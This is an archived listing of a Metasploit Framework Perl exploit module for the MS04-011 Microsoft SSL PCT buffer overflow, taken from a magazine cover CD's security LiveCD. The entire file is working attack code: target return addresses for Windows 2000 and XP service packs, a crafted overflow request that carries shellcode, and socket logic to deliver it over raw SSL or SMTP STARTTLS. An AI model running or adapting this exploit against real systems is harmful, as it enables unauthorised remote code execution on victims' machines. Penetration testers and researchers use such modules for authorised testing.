home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / windows_ssl_pct.pm < prev    next >
Text File  |  2006-06-30  |  5KB  |  166 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::windows_ssl_pct;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'    => 'Microsoft SSL PCT MS04-011 Overflow',
  20.     'Version' => '$Revision: 1.19 $',
  21.     'Authors' =>
  22.       [
  23.         'H D Moore <hdm [at] metasploit.com>',
  24.         'Johnny Cyberpunk <jcyberpunk [at] thc.org> [Unknown License]'
  25.       ],
  26.  
  27.     'Arch'  => [ 'x86' ],
  28.     'OS'    => [ 'win32', 'win2000', 'winxp' ],
  29.     'Priv'  => 1,
  30.  
  31.     'AutoOpts'  => { 'EXITFUNC' => 'thread' },
  32.     'UserOpts'  =>
  33.       {
  34.         'RHOST' => [1, 'ADDR', 'The target address'],
  35.         'RPORT' => [1, 'PORT', 'The target port', 443],
  36.         'PROTO' => [0, 'DATA', 'The application protocol (raw or smtp)', 'raw'],
  37.       },
  38.  
  39.     'Payload' =>
  40.       {
  41.         'MinNops'   => 0,
  42.         'MaxNops'   => 0,
  43.         'Space'     => 1800,
  44.         'BadChars'  => '',
  45.       },
  46.  
  47.     'Description'  => Pex::Text::Freeform(qq{
  48.         This module exploits a buffer overflow in the Microsoft Windows SSL PCT
  49.     protocol stack. This code is based on Johnny Cyberpunk's THC release
  50.     and has been tested against Windows 2000 and Windows XP. To use this module,
  51.     specify the remote port of any SSL service, or the port and protocol of
  52.     an application that uses SSL. The only application protocol supported at
  53.     this time is SMTP. You only have one chance to select the correct target,
  54.     if you are attacking IIS, you may want to try one of the other exploits
  55.     first (WebDAV). If WebDAV does not work, this more than likely means that
  56.     this is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS 5.1). Using
  57.     the wrong target may not result in an immediate crash of the remote system.
  58. }),
  59.  
  60.     'Refs'    =>
  61.       [
  62.         ['OSVDB', '5250'],
  63.         ['MSB', 'MS04-011'],
  64.         ['MIL', '77'],
  65.       ],
  66.     
  67.     'Targets' =>
  68.       [
  69.         ['Windows 2000 SP4', 0x67419ce8], # jmp [esp + 0x6c]
  70.         ['Windows 2000 SP3', 0x67419e1d], # jmp [esp + 0x6c]
  71.         ['Windows 2000 SP2', 0x6741a426], # jmp [esp + 0x6c]
  72.         ['Windows 2000 SP1', 0x77e4f44d], # jmp [ebx + 0x14]
  73.         ['Windows 2000 SP0', 0x7658a6cb], # jmp [ebx + 0x0e]
  74.         ['Windows XP SP0',   0x0ffb7de9], # jmp [esp + 0x6c]
  75.         ['Windows XP SP1',   0x0ffb832f], # jmp [esp + 0x6c]
  76.         ['Debugging Target', 0x01020304], # -----------------
  77.       ],
  78.     
  79.     'Keys'  => ['ssl', 'lsass'],
  80.  
  81.     'DisclosureDate' => 'Apr 13 2004',
  82.   };
  83.  
  84. sub new {
  85.     my $class = shift;
  86.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  87.     return($self);
  88. }
  89.  
  90. sub Exploit {
  91.     my $self = shift;
  92.     my $target_host = $self->GetVar('RHOST');
  93.     my $target_port = $self->GetVar('RPORT');
  94.     my $target_idx  = $self->GetVar('TARGET');
  95.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  96.  
  97.     my $proto  = $self->GetVar('PROTO');
  98.     my $target = $self->Targets->[$target_idx];
  99.  
  100.     $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
  101.  
  102.     # this is a heap ptr to the ssl request
  103.     # ... and just happens to not die
  104.     # thanks to Core ST, Halvar, JohnnyC :)
  105.     #
  106.     #   80620101     =>  and byte ptr [esi+1], 0x2
  107.     #   bd00010001   =>  mov ebp, 0x1000100
  108.     #   0016         =>  add [esi], dl
  109.     #   8f8201000000 =>  pop [esi+1]
  110.     #   eb0f         =>  jmp short 11 to shellcode
  111.  
  112.     my $request =
  113.       "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00".
  114.       "\xeb\x0f".'XXXXXXXXXXX'.pack('V', ($target->[1] ^ 0xffffffff)).
  115.       $shellcode;
  116.  
  117.     my $s = Msf::Socket::Tcp->new
  118.       (
  119.         'PeerAddr'  => $target_host,
  120.         'PeerPort'  => $target_port,
  121.         'LocalPort' => $self->GetVar('CPORT'),
  122.         'SSL'       => 0,
  123.       );
  124.  
  125.     if ($s->IsError) {
  126.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  127.         return;
  128.     }
  129.  
  130.     my $res;
  131.  
  132.     # Exploit via SMTP and STARTTLS
  133.     if ($proto =~ /smtp/i) {
  134.         $res = $s->Recv(-1, 45);
  135.         $res =~ s/\r|\n//g;
  136.         $self->PrintLine("[*] REMOTE> $res");
  137.  
  138.         $s->Send("HELO METASPLOIT.COM\r\n");
  139.         $res = $s->Recv(-1, 5);
  140.         $res =~ s/\r|\n//g;
  141.         $self->PrintLine("[*] REMOTE> $res");
  142.  
  143.         $s->Send("STARTTLS\r\n");
  144.         $res = $s->Recv(-1, 5);
  145.         $res =~ s/\r|\n//g;
  146.         $self->PrintLine("[*] REMOTE> $res");
  147.  
  148.         if ($res !~ /^220.*SMTP server ready/) {
  149.             $self->PrintLine("[*] Invalid response to STARTTLS");
  150.             return(0);
  151.         }
  152.     }
  153.  
  154.     $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
  155.     $s->Send($request);
  156.  
  157.     $self->PrintLine("[*] Waiting for a response...");
  158.     $res = $s->Recv(-1, 5);
  159.  
  160.     if ($res && $res eq "\x00\x00\x01") {
  161.         $self->PrintLine("[*] Response indicates that PCT is disabled");
  162.     }
  163.  
  164.     return(0);
  165. }
  166.